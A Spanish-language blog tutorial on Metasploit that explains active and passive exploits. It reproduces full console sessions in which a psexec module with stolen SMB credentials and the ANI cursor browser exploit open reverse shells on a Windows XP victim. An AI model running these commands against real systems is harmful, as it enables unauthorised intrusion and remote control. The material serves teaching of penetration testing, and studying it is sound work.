Enviado por fredyavila2 el Sáb, 21/04/2018 - 21:50
Metasploit

Todos los exploits de metasploit se dividen en dos categorías: activos y pasivos.

Exploits activos:

Los exploits activos son aquellos que explotan un host especifico, se ejecutan hasta completarse y entonces salen.

  • Los módulos de fuerza bruta pueden salir cuando una shell es abierta por la victima.
  • Si un error ocurre, la ejecución del módulo se detiene.
  • Usted puede forzar un módulo activo a pasar a "background" o segundo plano pasando el argumento -j al comando del exploit.
    msf exploit(ms08_067_netapi) > exploit -j
    [*] Exploit running as background job.
    msf exploit(ms08_067_netapi) >

     

Ejemplo de un exploit activo: El siguiente ejemplo muestra cómo se configura una serie de parámetros y credenciales previamente adquiridas para explotar y obtener una shell en el sistema remoto.

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.1.100
RHOST => 192.168.1.100
msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(psexec) > set LPORT 4444
LPORT => 4444
msf exploit(psexec) > set SMBUSER victim
SMBUSER => victim
msf exploit(psexec) > set SMBPASS s3cr3t
SMBPASS => s3cr3t
msf exploit(psexec) > exploit

[*] Connecting to the server...
[*] Started reverse handler
[*] Authenticating as user 'victim'...
[*] Uploading payload...
[*] Created \hikmEeEM.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (ciWyCVEp - "MXAVZsCqfRtZwScLdexnD")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \hikmEeEM.exe...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.100:1073)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Exploits Pasivos.

Los exploits pasivos funcionan de esta manera: esperan hasta que un host interactue con el exploit y entonces lo explotan.

  • Los exploit pasivos se concentran normalmente en navegadores, clientes FTP y similares.
  • Pueden ser usados en conjunto con exploits enviados por e-mail.
  • Los exploits pasivos, una vez ejecutados, reportan que se ha abierto una shell y esperan ser enumerados pasando el argumento -l al comando sessions. Pasando el argumento -i interactuamos con una shell que se encuentre en el listado.
    msf exploit(ani_loadimage_chunksize) > sessions -l
    
    Active sessions
    ===============
    
      Id  Description  Tunnel
      --  -----------  ------
      1   Meterpreter  192.168.1.5:52647 -> 192.168.1.100:4444
    
    msf exploit(ani_loadimage_chunksize) > sessions -i 1
    [*] Starting interaction with 1...
    
    meterpreter >

Ejemplo de un exploit pasivo: El siguiente texto muestra cómo se configura el exploit que explota la vulnerabilidad del cursos animado en Windows. El exploit no es lanzado hasta que la víctima accede a nuestro sitio web malicioso.

msf > use exploit/windows/browser/ani_loadimage_chunksize
msf exploit(ani_loadimage_chunksize) > set URIPATH /
URIPATH => /
msf exploit(ani_loadimage_chunksize) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ani_loadimage_chunksize) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(ani_loadimage_chunksize) > set LPORT 4444
LPORT => 4444
msf exploit(ani_loadimage_chunksize) > exploit
[*] Exploit running as background job.

[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://192.168.1.5:8080/
[*] Server started.
msf exploit(ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 192.168.1.100:1077...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 192.168.1.100:1077...
[*] Sending stage (240 bytes)
[*] Command shell session 2 opened (192.168.1.5:4444 -> 192.168.1.100:1078)

msf exploit(ani_loadimage_chunksize) > sessions -i 2
[*] Starting interaction with 2...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\victim\Desktop>

Usando exploits.

Para seleccionar un exploit en Metasploit, debes usar el comando use seguido de la palabra exploit, el sistema vulnerable, el protocolo/aplicación vulnerable y el código del exploit.

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) > help

# Texto y más texto hasta que vemos los comandos del exploit.

Exploit Commands
================

    Command       Description
    -------       -----------
    check         Check to see if a target is vulnerable
    exploit       Launch an exploit attempt
    pry           Open a Pry session on the current module
    rcheck        Reloads the module and checks if the target is vulnerable
    recheck       Alias for rcheck
    reload        Just reloads the module
    rerun         Alias for rexploit
    rexploit      Reloads the module and launches an exploit attempt
    run           Alias for exploit

msf exploit(windows/smb/ms08_067_netapi) > 

Adicionalmente puedes usar la opción show seguida de las opciones que deseas ver, tales cómo son: targets, payloads, options, advanced, evasion. Ejemplo:

Autor: Edu4rdSHL

Síguenos en Facebook, Twitter, unete a nuestra charla en Riot, únete a IRC o únete a Telegram y no olvides compartirnos en las redes sociales. También puede hacernos una donación.

Etiquetas

Acerca del autor

Fredy Yesid Avila - Ingeniero de Sistemas, CEH - ECSA.

@fredyavila